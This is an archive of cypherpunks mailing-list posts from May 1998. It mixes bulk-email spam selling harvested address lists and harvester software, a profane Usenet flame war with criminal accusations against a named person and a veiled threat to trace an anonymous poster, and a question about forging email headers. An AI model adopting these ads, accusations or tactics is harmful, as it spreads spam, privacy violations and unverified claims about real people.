For questions regarding our service, use the contact information in this letter. The return email address does not respond to incoming email. If you are not interested in this offer,  you can be removed from our mailing list by sending an email to: p-jerry@usa.net    Simply send it and your email address  will be automatically removed from our mailing list.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: WEBMASTER@successads.com
Date: Thu, 14 May 1998 21:05:53 -0700 (PDT)
To: 2friend@juno.com
Subject: MASTER MARKETER RESOURCE CD....
Message-ID: <199805150305.FAA04154@netsurf-pe.peine.netsurf.de>
MIME-Version: 1.0
Content-Type: text/plain


Hello Fellow Marketer,

We have everything you need to promote your online
business and target your advertising!!

The "Master Marketers Resource CD."

This CD has over 20 Million categorized, targeted and
general email addresses! Targeted email addresses are 
by far the most expensive... but for a limited time, we 
are including them on the Master Marketers Resource CD.

Do not be mistaken... this offer is not like any other
you have ever received. We have seen randomly gathered
email address CD's selling for as much as $249.00 
Just one I received today was offering 15 million AOL 
addresses for $189.95!! They were not targeted, categorized,
or nothing! Just 15 million AOL addresses of who knows what.

We also have AOL addresses on the Master Marketers
Resource CD; 4,000,000... We also have addresses of
Business Opportunity Seekers; 1,000,000... Adult Web Site 
Subscribers; 135,000 (we sell this list alone for $250.00 - 
but it is included on this Resource CD). 

Investor oriented addresses; 300,000... E-Mail addresses 
sorted by city; 200,000... General consumer lists; 290,000 
Email addresses of those interested in Health; 230,000... 
and over 150,000 Food Enthusiasts!! Make no mistake!!... 
this is by far the best collection of email addresses available 
anywhere. 

In all... there are 11 categories (over 2,500,000 of targeted 
email addresses) and over 20,000,000 addresses from the top
three internet/online providers. We have also included a 
remove/undeliverable list that's over 100 meg in size!! We 
have already cleaned the addresses on the Master Marketer 
Resource CD using this massive remove file... they are ready to
mail right now.


As A Special Bonus...

In addition to the email addresses... we have also included
on the CD over 30 CGI Scripts (one will hide where your
mail is being sent to on your order forms - must have for 
taking orders). There are forum scripts, chat scripts and
just about any other cgi script you will ever need.

We have also included over 50 java scripts! Many are
scripts for adding rotating banners to your site, adding
scrolling ticker and marque messages and scripts that password
protect a page on your web site.

We have also included demos of over 15 of the top bulk
email programs on the Internet. Stealth, Rapid Fire, NetContact
and many more! We have also included demo's of email address
harvesters like Hurricane, Grabber and Atomic Harvestor that
let you extract fresh email addresses out of forums and
right out of web pages. 

There is much more on the CD than we can go into on a short
letter like this one (there is over 10 html editors, over
200 marketing reports and more). In all... in addition to
the bulk email and html editors... there is over 20 of the
top software programs on the Internet. From programs that
keep you connected to the Internet... to programs that let
you accept checks online (this one is a registered version)! 

You will save hours (if not weeks) in download time as we have
included the top shareware and freeware programs available
anywhere. 

If you are serious about making money on the Internet... you
must have the Master Marketers Resource Cd! There is nothing
like it currently available! 

If you are ready to target your advertising... you can order
the Master Marketers Resource CD by completing the form
below. Don't miss out... we are only selling a limited number
of the Master Marketer Resource CD's. In order to preserve the
responsiveness of the addresses, this offer may be withdrawn 
at anytime.

------------------------------------------------------------
Please note: Most of the software on the CD is shareware. If
you like it... buy it. We have included the programs because
we feel most are pertinent to Internet marketing.
-----------------------------------------------------------


"You can buy from the REST or you can buy from the BEST."   Your choice. 


>>> NOW ONLY $199.00!   

This price is effective for the next seven days, thereafter the price will be $249.00 so ORDER NOW!

To order our email package, simply print out the EZ ORDER FORM 
below and fax or mail it to our office today.

We accept Visa, Mastercard, Discover, Amex and  Checks by Fax and Mail.

_________________
EZ Order Form 
 

_____Yes! I would like to order the Master Marketers Resource CD
     Email addresses and much, much more for only $199.00.
 

*Please select one of the following for shipping..

____I would like to receive my package OVERNIGHT. I'm including 
$15 for shipping. (outside US add an additional $25 for shipping)

____I would like to receive my package 2 DAY delivery. I'm including 
$10 for shipping.  (outside US add an additional $25 for shipping)


DATE_____________________________________________________

NAME____________________________________________________

COMPANY NAME___________________________________________

ADDRESS_________________________________________________

CITY, STATE, ZIP___________________________________________

PHONE NUMBERS__________________________________________

FAX NUMBERS_____________________________________________

EMAIL ADDRESS___________________________________________



TYPE OF CREDIT CARD: 

______VISA _____MASTERCARD ______AMEX______DISC

CREDIT CARD# __________________________________________

EXPIRATION DATE________________________________________

NAME ON CARD___________________________________________

AMOUNT $____________________
 

(Required) SIGNATURE:x________________________

DATE:x__________________


You may fax your order to us at:   1-704-784-5595

CHECK BY FAX SERVICES!

If you would like to fax a check, paste your check below and fax it to 
our office along with all forms to: 1-704-784-5595

******************************************************

***24 HOUR FAX SERVICES*** PLEASE PASTE YOUR 

CHECK HERE AND FAX IT TO US AT 1-704-784-5595


*******************************************************

If You fax a check, there is no need for you to send the original check. We will draft up a new check, with the exact information from your original check. All checks will be held for bank clearance.

If you feel more comfortable sending payment through the mail, 
please send all forms and Check or Money Order to:

CONSUMER CONNECTIONS
10223-B UNIV. CITY BLVD. #197 
CHARLOTTE, NC  28213







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Tim C. May" <tcmay@got.net>
Date: Wed, 13 May 1998 23:28:05 -0700 (PDT)
To: StanSqncrs <StanSqncrs@aol.com>
Subject: Re: "... would cause us to look at this person as a threat"
In-Reply-To: <23d07d72.3558d3d9@aol.com>
Message-ID: <355A796B.5741@got.net>
MIME-Version: 1.0
Content-Type: text/plain


StanSqncrs wrote:
> >  > Subject: Cults and Government?
> >  >
> >  > "Just ran across this quote from AG Janet Reno. From a person of such
> >  > high power, these are scary words. --------- "
> 
> <snip - the "spam">
> 
> >  > "-Attorney General Janet Reno, Interview on 60 Minutes, June 26,
> >  > 1994"

> Bad beginning, Sir Will.  The willingness to pass along material of dubious
> authenticity is not a good sign in my book. As Mr. Natural would say, "Check
> your source."  So, what *IS* your source?

This qualifies as an Official News Story Quote under the guidelines 
released by 'True Lies On The InterNet Coommiittee' which was formed
on Oct. 3, 1954.
To meet these guidelines, a quote must:
1. Be attributed to a species with the capacity for speech.
2. Be consistent with something 'everyone knows' the one quoted 'could 
have said'.
3. Be an attempt at misinformation which does not exceed the magnitude
of the average MainStream Press 'lean' on the Truth (TM).
4. Provide a means for those reading the quote to check the veracity
of the source and/or the accurateness of the quote, regardless of
whether or not the message headers are forged.
5. Not be from a 'cocksucker'.

If you check the CypherPunks archives, you will find that a Great
American and True CypherPunk with a humungous schlong once sent a
post to the list, titled, "Forgeries are your Friend."
Think about it...

"The tree of tyranny must be watered periodically with the piss of citizens...."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Proctologist       | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rzz@rzz.sigov.si
Date: Wed, 13 May 1998 08:25:06 -0700 (PDT)
To: rzz@rzz.sigov.si
Subject: JUST RELEASED!  10 Million!!!
Message-ID: <011297055501222@g_fantasm.com>
MIME-Version: 1.0
Content-Type: text/plain



IT WAS JUST RELEASED!!
 
INTRODUCING...MILLIONS VOL. 1A

We took a total of over 92 million email addresses from many of the
touted CD's that are out there (bought them all - some were $300+)!
We added the millions we had in storage to those.   When we
combined them all, we had in excess of 100+ million addresses
in one huge file.

We then ran a super "sort/de-dupe" program against this huge list.
It cut the file down to less than 25 million!!! Can you believe that? It
seems that most people that are selling CD's are duping the public
by putting numerous files of addresses in the CD over and over. This
created many duplicate addresses. They also had many program
 "generated" email addresses like Compuserve, MCI, ANON's, etc.
This causes a tremendous amount of undeliverables, and for  those
that use Stealth programs, clogs up servers quickly with trash, etc.

We then ran a program that contained 1800+ keywords to remove
addresses with vulgarity,  profanity, sex-related names, postmaster,
 webmaster, flamer, abuse, spam, etc., etc.   Also eliminated all .edu,
.mil, .org, .gov, etc.   After that list was run against the remaining list,
it  reduced it down to near 10 million addresses!

So, you see, our list will save people hundreds of dollars buying all
others that are out there on  CD and otherwise. Using ours will be like
 using the 100+ million that we started with, but a lot less money and
alot less time!!

We also purchased Cyber-Promos ($995.00) CD.  We received it just
prior to finishing production work on the new CD.  We had our people
take a random sample of 300,000 addresses  from the touted 2.9 that
they advertised.   We used a program that allows us to take a random
sample of addresses from any list.  We were able to have the program
take every 9th address, thus giving us a 300,000 list of Cyber's email
addresses from top to bottom.  We cleaned these, and came up with about
100,000 addresses. These are also mixed in.

We also included a 6+ million "Remove/Flamer" file broke into seperate
files for ease of  extracting and adding to your own database of removes.

 "You can buy from the REST or you can buy from the BEST.   Your choice.
_____________________________

What others are saying:
 
"I received the CD on Friday evening.   Like a kid with a new toy, I
immediately started bulking out using the new email addresses.  Over
the course of the weekend, I emailed out over 500,000 emails and I
received less than TWENTY undeliverables!!  I am totally satisfied
with my purchase!!  Thanks Premier!!"

Dave Buckley
Houston,  TX

"This list is worth it's weight in gold!!  I sent out 100,000 emails for my
product and received over 55 orders!

Ann Colby
New Orleans, LA

****************************************
 
                  HERE'S THE BOTTOM LINE

Here is what you get when you order today!

>> 10 Million Email Addresses... 1 per line in simple text format on a CD.
Files are in lots of 5,000 (no codes needed to open files).
All files are separated by domain name for your convenience.
 
PLUS you receive a tremendous REMOVE list!
6 Million+ 

>>> NOW ONLY $150.00!

This price is effective for the next seven days, thereafter the price will be
$199.00 so ORDER NOW!

All lists are completely free of any Duplicates. We also on a continual
basis, add New Names and Remove Undeliverables and Remove
Requests.
 
The result is the Cleanest Email Addresses Available Anywhere
to use over and over again, for a FRACTION of the cost that other
companies charge. Typical rates for acquiring email lists are from
1 cent to as high as 3 cents per email address - that's
"INFORMATION HIGHWAY" ROBBERY!.


***ADDED BONUS***
All our customers will have access to our updates on the CD volume
they purchase.  That's right, we continually work on our CD.  Who 
knows when those other CDs were made. We're constantly adding 
and deleting addresses, removes. Etc.  It all comes back to quality.  
No one else offers that! 

Don't even hesitate on this one or you will miss out on the most
effective way to market anywhere...PERIOD!

If you have any further questions or to place an order by
phone, please do not hesitate to call us at:

                              908-245-1143

To order our email package, simply print out the EZ ORDER FORM
below and fax or mail it to our office today.
 
We accept Visa, Mastercard, AMEX, Checks by Fax and Mail.
 
 _________________
EZ Order Form
 

 _____Yes! I would like to order MILLIONS Vol. 1A email addresses
for only $150.00.
 
*Please select one of the following for shipping..
 
____I would like to receive my package OVERNIGHT. I'm including
$15 for shipping. (outside US add an additional $25 for shipping)
 
____I would like to receive my package 2 DAY delivery. I'm including
$10 for shipping.  (outside US add an additional $25 for shipping)
 
DATE_____________________________________________________
 
NAME____________________________________________________

COMPANY NAME___________________________________________

ADDRESS_________________________________________________

CITY, STATE, ZIP___________________________________________
 
PHONE NUMBERS__________________________________________
 
FAX NUMBERS_____________________________________________
 
EMAIL ADDRESS___________________________________________
 
TYPE OF CREDIT CARD:
 
______VISA _____MASTERCARD
 
CREDIT CARD# __________________________________________
 
EXPIRATION DATE________________________________________
 
NAME ON CARD___________________________________________
 
AMOUNT $____________________
 
 
(Required) SIGNATURE:x________________________
 
DATE:x__________________
 
You may fax your order to us at:   1-908-245-3119
 
CHECK BY FAX SERVICES!
 
If you would like to fax a check, paste your check below and fax it to
our office along with all forms to: 1-908-245-3119

******************************************************

***24 HOUR FAX SERVICES*** PLEASE PASTE YOUR
 
CHECK HERE AND FAX IT TO US AT 1-908-245-3119
 
*******************************************************
 
If You fax a check, there is no need for you to send the original check.
We will draft up a new check, with the exact information from your
original check. All checks will be held for bank clearance.

If you feel more comfortable sending payment through the mail,
please send all forms and Check or Money Order to:
 
JKP Enterprises
700 Boulevard 
Suite 102
Kenilworth, NJ 07033






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gburnore@netcom.com (Gary L. Burnore)
Date: Wed, 13 May 1998 17:02:16 -0700 (PDT)
Subject: Re: Abusive crossposting by anonymous remailer user (Was: Gary Lee Burnore is a Convicted Sex Offender in Raleigh, NC)
In-Reply-To: <3555FA78.7795@pageplanet.com>
Message-ID: <35613238.439321674@206.214.99.10>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 13 May 1998 15:11:11 +0200 (MET DST), in article
<199805131311.PAA05504@basement.replay.com>, nobody@REPLAY.COM (Anonymous)
wrote:

:eridani@databasix.com (Belinda Bryan) wrote:
:
:> And there we have it, folks.  The anonymous stalker who's spent the past
:> year following Gary Burnore around Usenet found a post in
:> triangle.general that mentioned him, added a propaganda-filled follow up
:> to it, and posted it to 9 newsgroups--many of whom have repeatedly
:> requested that this crap be kept out of said groups.
:
:"Anonymous stalker"?  For merely posting a reply to a public post on
:Usenet?  What state or country has a statute against that, and what makes
:you think the poster falls under its jurisdiction if it does exist?  As for
:whether a certain post is "propaganda", that is for the reader to decide,
:especially when of the content is independently verifiable.  The
:"propaganda" you refer to was apparently intended to refute the fallacious
:assertion that since Gary Lee Burnore's entry in the North Carolina
:official database of registered sex offenders had apparently been removed,
:then the underlying crime for which he was convicted and required to
:register somehow automagically never happened.  To make such an assertion
:is to invite rebuttal.

Only for someone as obsessed in this as you.  Everyone else I've seen post
except those who have a grudge directly against me has said something similar
to "who gives a fuck?"  Your obsession continues.


:
:The thread you're whining about involved Steve Crisp <crisp@pageplanet.com>
:threatening an anonymous poster with "beating the living fuck out of you"
:if his/her identity could be determined, a second anonymous poster
:challenging the propriety of such a threat, and yet another DataBasix
:groupie, William McClatchie <wmcclatc@primenet.com>, calling the second
:anonymous poster a "remailer abuser" for daring to make such a challenge.
:So rather than denouncing the threat itself, you choose to call the person
:challenging it an "anonymous stalker"?  If you feel no need to "hide"
:anything, please feel free to post your street address and home phone
:number.  But I imagine that many people with small children would not want
:their names, from which their street address can be derived by someone with
:the resources available to you and Gary Burnore, to fall into the hands of
:a convicted child molester with a history of abusive retaliation.


Geesh you ignorant fuck. It's been posted more times than I can count.  You
don't remember posting it right? Oh wait, that was someone else who's obsessed
with me right?  Uh huh.  The same way you posted Steve's info you posted mine.

:
:Being threatened with physical violence for making an unpopular post is
:one of the best arguments available as to why anonymity is necessary when
:people like Steve Crisp and convicted child molester Gary Lee Burnore are
:running around loose making those threats.

If people like you weren't allowed to abuse remailers, people like chris
wouldn't make comments that he knows are not threats to draw you out.  You buy
it hook line and sinker.   You must certianly know that he's not threatning
anyone since you're posting anonymously and he couldn't possibly know who you
are.  But obsessed as you are you can't take it.  

:
:> Oh and lookee what else:  it was mailed to cypherpunks@toad.com,
:> presumably for archival on the cypherpunks mailing list, where it will
:> be picked up by WWW search engines.  Since those folks don't seem to
:> mind having their archives used in personal grudge matches, I'll just
:> start cc'ing my responses there as well.  I'm sure, as champions of free
:> speech, they can understand the necessity of making sure both sides of
:> the story get equal time.
: 
:This, of course, comes from the same Belinda Bryan who impersonated a
:lawyer for DataBasix to demand the disclosure of (fortunately non-existant)
:user logs from the Huge Cajones remailer in a failed Scientology-esque
:attempt to embarass its users.


More lies from the obsessed one as Belinda NEVER impersonated a lawyer for
anyone.  Beating dead horses is your specialty isn't it?

:  And that attack, BTW, started because Gary
:Burnore was pissed that an anonymous whistle blower used a remailer to tip
:of his victim's mother to the molestation.  As is typical of his style,
:Burnore denounced that legitimate use of anonymity as "harassment" and
:"abuse".  


More unproven lies.  If you, the anonymous asshole were really interested in
the truth (rather than your obsession with me) you'd get the court documents
and see that the dates do not support your libelous statements.  Libelous
statements are the best argument for remailers.  If you need to make a
libelous statement, do it from a remailer.  Nothing will happen to you. (Other
than folks will begin to ignore the remailer)


:
:It was also Burnore who chose to make PUBLIC what had previously been a
:private e-mail, thus inviting his critics to factually evaluate the claims.
:One of them apparently did so and discovered Gary Burnore's name and mug
:shot were published on an official PUBLIC website of registered sex
:offenders maintained by the state of North Carolina where Burnore moved
:after leaving San Francisco. 

More lies from the anonymous asshole.  It's not been that long since this
started that people don't remember how and why it was posted to USENet.  It
had nothing to do with an email.

: Perhaps he should have learned a lesson from
:Gary Hart and not have taunted the wrong people to find evidence of his
:wrongdoing.

Perhaps I should continue to improve my tracing skills and find you one day.

:
:Will the continual harangue against privacy and anonymity by Gary Lee
:Burnore, Belinda Bryan, Billy McClatchie, and other staffers and sock
:puppets of the DataBasix wrecking crew never end?


Translation:  If Gary Burnore and Belinda Bryan and Bill McClatchie leave the
internet, the anonymous asshole will stop lying.
:
:BTW, Belinda, cross-posting your whining drivel in the fashion you're
:threatening negates your lame attempts to achieve deniability by using the
:infamous X-No-Archive header that has become the trademark of DataBasix'
:denizens. 

You've never given a valid reason why someone should or should not use an
X-No-Archive header.  You hide behind a remailer and libel and then complain
when someone X-No-Archives.  Typical hypocritical thinking.

: IOW, you won't be able to retroactively claim that an
:embarassing post from you was "forged" because it's not archived at an
:unbiased, third party site.  Can you say "oops"?

Well we'll see about unbiased sites now won't we? 


-- 
        for i in databasix netcom primenet ; do ; gburnore@$i ; done
---------------------------------------------------------------------------
                  How you look depends on where you go.
---------------------------------------------------------------------------
Gary L. Burnore                       |  ۳ݳ޳ݳۺݳ޳ݳݳ޳ݳ۳
                                      |  ۳ݳ޳ݳۺݳ޳ݳݳ޳ݳ۳
DOH!                                  |  ۳ݳ޳ݳۺݳ޳ݳݳ޳ݳ۳
                                      |  ۳ 3 4 1 4 2  ݳ޳ 6 9 0 6 9 ۳
spamgard(tm):  zamboni                |     Official Proof of Purchase
===========================================================================
             PGPprint: C63B CF4E 1B71 4D7E C6F8 AF4E 338D 5CB4
    KeyID: 0x0F7EDBD9 (RSA)     finger gburnore@netcom.com for public key
---------------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@base.xs4all.nl>
Date: Wed, 13 May 1998 17:34:46 -0700 (PDT)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <9083523aabe2496a001be5b119c0dd35@base.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


I was looking at my RAM when I noticed several passwords I have 
frequently used were still there, and as I never turn off my comp, I 
was wondering if there is a way you can "clean" your RAM?
I also got errors when installing LILO on my DOS partition, so now I 
*CAN'T* boot without a bootdisk, and I think LILO sticks itself on 
the master boot record, is there an MBR editor?
Where can I get a list of Candian Remailers?
Is there a DOS and/or Winbloze 3.* Email program that I can "forge" 
headers? (ex: Like in Linux fastmail adding: -f billc@whitehouse.gov)
thnx.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alt1@snowhill.com (Al Thompson)
Date: Thu, 14 May 1998 00:41:31 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re:
Message-ID: <199805140741.CAA16138@frost.snowhill.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:35 AM 5/14/98 +0200, Anonymous wrote:
>I was looking at my RAM when I noticed several passwords I have 
>frequently used were still there, and as I never turn off my comp, I 
>was wondering if there is a way you can "clean" your RAM?
>I also got errors when installing LILO on my DOS partition, so now I 
>*CAN'T* boot without a bootdisk, and I think LILO sticks itself on 
  
Use LOADLIN instead.  It's much nicer, and a LOT faster than LILO, and
doesn't require a boot floppy.
 
I would have replied only to you, except for the fact that you posted
anonymously.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSqncrs <StanSqncrs@aol.com>
Date: Thu, 14 May 1998 01:14:09 -0700 (PDT)
To: tcmay@got.net
Subject: Re:A 'Nobody' Out From 'Obscura'
Message-ID: <1cbf5f47.355aa786@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 5/14/98 1:28:03 AM Central Daylight Time, tcmay@got.net
writes:

<< > Bad beginning, Sir Will.  The willingness to pass along material of
dubious
 > authenticity is not a good sign in my book. As Mr. Natural would say,
"Check
 > your source."  So, what *IS* your source?
 
 This qualifies as an Official News Story Quote under the guidelines 
 released by 'True Lies On The InterNet Coommiittee' which was formed
 on Oct. 3, 1954. >>

Maybe so, but does something 4 years old qualify as "news"?  Only to a
victim(/perpertrator) of a anti-reality campaign.

Stan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Banisar <banisar@epic.org>
Date: Thu, 14 May 1998 05:17:36 -0700 (PDT)
To: cypherpunks@toad.com
Subject: 1998 EPIC Crypto Conference - Last week for Reduced Registration
Message-ID: <v04003a10b18091b09edf@[204.254.20.46]>
MIME-Version: 1.0
Content-Type: text/plain




   Top Government Officials, Industry Leaders, Cryptography Experts
      and Public Interest Advocates to Discuss Encryption Policy

                 *** Last week for Early Registration ***

                     *** CLE Credit Application Filed ***

                             Washington, DC
                          Monday, June 8, 1998

                  http://www.epic.org/events/crypto98/

Top government officials -- including Senator John Ashcroft (R-MO),
William Reinsch (Undersecretary of Commerce for Export Administration)
and Robert Litt (Principal Associate Attorney General) -- will discuss
current U.S. encryption policy at the largest policy conference on
cryptography ever held in Washington, D.C.  Other leading experts from
government, industry, the public interest community and academia will
also debate important legal, political and technical issues. If you are
interested in cryptography policy, this is the one meeting you must
attend!

The 1998 EPIC Cryptography and Privacy Conference is organized by the
Electronic Privacy Information Center, in cooperation with the Harvard
University Information Infrastructure Project and the Technology
Policy Research Group of the London School of Economics.


- THE 1998 EPIC CRYPTOGRAPHY AND PRIVACY CONFERENCE -

HIGHLIGHTS

   o Meet the technical experts, industry leaders, litigators, and
     policy makers who are shaping the global debate over encryption
     and privacy.

   o Get the latest news, reports, legislative information, and
     technical results.

   o Receive the 1998 edition of the highly-acclaimed EPIC Cryptography
     and Privacy Sourcebook.

   o Receive Continuing Legal Education Credits (CLE).


THE PANELS

   o Top U.S. government officials will debate top industry
     representatives on current U.S. policy on domestic restrictions,
     export controls, and pending legislation.

   o A panel of senior government officials from France, England,
     Canada, Germany and the European Union will describe encryption
     policies in their countries and future trends.

   o Leading cryptographers and technical experts will discuss the
     dangers and benefits of key escrow and key recovery systems and
     other important technical issues.

   o Attorneys representing the plaintiffs and the U.S. Government in
     the pending legal challenges to the constitutionality of export
     controls will discuss and debate the cases and their outcomes.


FEES:

Register before May 15 for reduced fee.

   Standard

       o $300.00 (before May 15) / $400.00 (after May 15)

   Academic/Govt/501(c)(3)

       o $150.00 (before May 15) / $200.00 (after May 15)


MORE INFORMATION, FULL AGENDA AND ONLINE REGISTRATION:

     http://www.epic.org/events/crypto98/

-------
David Banisar (Banisar@epic.org)                *    202-544-9240 (tel)
Electronic Privacy Information Center           *    202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301             *    HTTP://www.epic.org
Washington, DC 20003 * PGP Key  http://www.epic.org/staff/banisar/key.html







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 13 May 1998 23:31:59 -0700 (PDT)
To: cypherpunks@toad.com
Subject: NoT
Message-ID: <199805140631.IAA04681@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Fly Windows NT:
All the passengers carry their seats out onto the tarmac, placing the 
chairs
in the outline of a plane. They all sit down, flap their arms and make 
jet
swooshing sounds as if they are flying.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Thu, 14 May 1998 09:07:25 -0700 (PDT)
To: StanSqncrs <StanSqncrs@aol.com>
Subject: Re:A 'Nobody' Out From 'Obscura'
In-Reply-To: <1cbf5f47.355aa786@aol.com>
Message-ID: <v0313030ab180c717cba4@[209.66.100.158]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:12 AM -0700 5/14/98, StanSqncrs wrote:
>In a message dated 5/14/98 1:28:03 AM Central Daylight Time, tcmay@got.net
>writes:
>
><< > Bad beginning, Sir Will.  The willingness to pass along material of
>dubious
> > authenticity is not a good sign in my book. As Mr. Natural would say,
>"Check
> > your source."  So, what *IS* your source?
>
> This qualifies as an Official News Story Quote under the guidelines
> released by 'True Lies On The InterNet Coommiittee' which was formed
> on Oct. 3, 1954. >>

Stan ("and the Sequencers") quotes me as saying things I never said.


--Tim May

"The tree of liberty must be watered periodically with the blood of
tyrants...."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist              | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill.stewart@pobox.com
Date: Thu, 14 May 1998 10:08:21 -0700 (PDT)
To: Mark Tillotson <gibreel@pobox.com
Subject: Re: Chaffing and winnowing
In-Reply-To: <874syut9ld.fsf@wsuse5.mckesson.com>
Message-ID: <3.0.5.32.19980514092316.008c21f0@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


[Is this still appropriate for coderpunks?]

At 01:07 PM 5/14/98 +0100, Mark Tillotson wrote:
>However I view the process rather differently.  There are two channels
>- the message is carried in the MAC and in the plaintext bits.
>Chaffing simply serves to obliterate the plaintext channel.  The

But it _doesn't_ obliterate the plaintext channel;
it just obfuscates it a lot.

>recipient doesn't need to get the plaintext bits at all - they can
>simply try the MAC against both 0 and 1, and choose the correct one.
>(although this doubles the workload)

Depending on how sequence numbers are managed, it doesn't 
need to double it - if you try the MAC for 0, it either
succeeds or fails, and in either case you don't need to 
check the MAC for 1.  If you're using a shorter MAC which
might have collisions (e.g. 8 bits of a real MAC), you need to
check both, since both 0 and 1 could pass, trashing the bit,
and if you're using the "First different bit in MAC(0) and MAC(1)"
technique you obviously need to calculate both.

>Furthermore an "attacker" can't tell, without breaking the MAC scheme,
>whether the plaintext is genuine or a blind, and so this makes
>chaffing/winnowing an ideal carrier of steganography.  It's like
>sending a plaintext file and a ciphertext file together, with an
>assertion that they correspond - unless you can prove this assertion
>how can an outsider be convinced you are not hiding information in the
>ciphertext file?  How can you prove this assertion without giving away
>your MAC key?  How can you demonstrate you are using a MAC and not
>simply triple-DES?

It's easy to demonstrate that the wheat channel is using real MACs -
if you're hauled into court for some violation or lawsuit,
you can probably be ordered to deliver the key (if you kept it),
since it's "not" being used to keep the message secret,
"only" to authenticate it.  

For the chaffing techniques that can use random chaff, though, 
you really can't prove that the "random" numbers are random 
as opposed to stegotext without giving up the stegotext
unless they're generated by a pseudo-random algorithm
which uses a key you can reproduce (as opposed to a 
session key from /dev/random.)

Will the real use of chaffing/winnowing be to send
uninteresting cover traffic and carry stegotext as chaff?
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 144tt4 <144tt4@msn.com>
Date: Wed, 13 May 1998 18:48:47 -0700 (PDT)
To: <cyber-rights@cpsr.org>
Subject: No Subject
Message-ID: <19943672.886214@relay.comanche.denmark.eu>
MIME-Version: 1.0
Content-Type: text/plain


Authenticated sender is <144tt4@msn.com>
Subject:  1 44 t
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

EMAIL MARKETING WORKS!!

Bull's Eye Gold is the PREMIER email address collection tool.
This program allows you to develop TARGETED lists of email
addresses.  Doctors, florists, MLM, biz opp,...you can collect
anything...you are only limited by your imagination!  You can
even collect email addresses for specific states, cities, and
even countries!  All you need is your web browser and this program.
Our software utilizes the latest in search technology called
"spidering". By simply feeding the spider program a starting
website it will collect for hours. The spider will go from website
to targeted website providing you with thousands upon thousands of
fresh TARGETED email addresses. When you are done collecting,  the
spider removes duplicates and saves the email list in a ready to
send format. No longer is it necessary to send millions of ads to
get a handful of responses...SEND LESS...EARN MORE!!!

A terrific aspect of the Bull's Eye software is that there is
no difficult set up involved and no special technical mumbo-jumbo
to learn. All you need to know is how to search for your targeted
market in one of the many search engines and let the spider do the
rest! Not familiar with the search engines? No problem, we provide
you with a list of all the top search engines. Just surf to the
location of a search engine on your browser then search for the
market you wish to reach...it's that easy!

For instance if you were looking for email addresses of Doctors
in New York all you would do is:

1) Do a search using your favorite search engine by typing in
the words doctor(s) and New York
2) Copy the URL (one or more)...that's the stuff after the
http://...  for instance it might look like
http://www.yahoo.com/?doctor(s)/?New+York
3) Press the START button

THAT's IT!!!  The Bull's Eye spider will go to all the websites
that are linked, automatically extracting the email addresses
you want.

The spider is passive too! That means you can let it run all
day or all night while you are working on important things or
just having fun on your computer. There is no need to keep a
constant watch on it, just feed it your target market and give
it praise when it delivers thousands of email addresses at
the end of the day!

Features of the Bull's Eye Software:

* Does TARGETED searches of websites collecting the email
  addresses you want!
* Collects Email addresses by City, State, even specific
  Countries
* Runs Automatically...simply enter the Starting information,
  press The Start Button, and it does the rest
* Filters out duplicates
* Keeps track of URLs already visited
* Can run 24 hours per day, 7 days per week
* Fast and Easy List Management
* Also has built in filtering options...you can put in words
  that it "Must" have while searching,...you can even put in
  criteria that it  "Must NOT Have"...giving you added flexibility
* Also imports email addresses from any kind of files (text
  files, binary files, database files)
* List editor handles Multiple files to work on many lists
  simultaneously
* Has a Black-Book feature... avoid sending emails to people
  who do not want to receive it
* Built-in Mail program...send email directly on the internet
  with just a click of your mouse
* Personalized Emails...if the email address has the user's
  name when it is collected,..you can send Personalized emails!!!
* Sort by Location, Server, User Name, Contact Name
* Advanced Operations:
 Email address lists export in many different formats
  (HTML, Comma delimited, text file)
 Advanced editing...Transfer, Copy,  Addition, Delete, Crop,
  Move to Top/Bottom
 Operations between lists...Union, Subtraction, Comparison
* Program is Passive,...meaning you can run other programs at
  the same time

CALL FOR MORE INFORMATION   213-980-7850
CALL FOR MORE INFORMATION   213-980-7850

ORDERING INFORMATION

Customer Name
Company Name
Address
City
State                       Zip
Phone                                       Fax
Email Address

______ BULL'S EYE SOFTWARE   $259.00
Includes Software, Instructions, Technical Support

______ Shipping & Handling  (2-3 Day Fedex)  $10.00
                           (Fedex Overnite) $20.00

______  TOTAL
                 (CA Residents add applicable sales tax)

*All orders are for Win 95 and Win NT

                *****CREDIT CARDS ACCEPTED*****
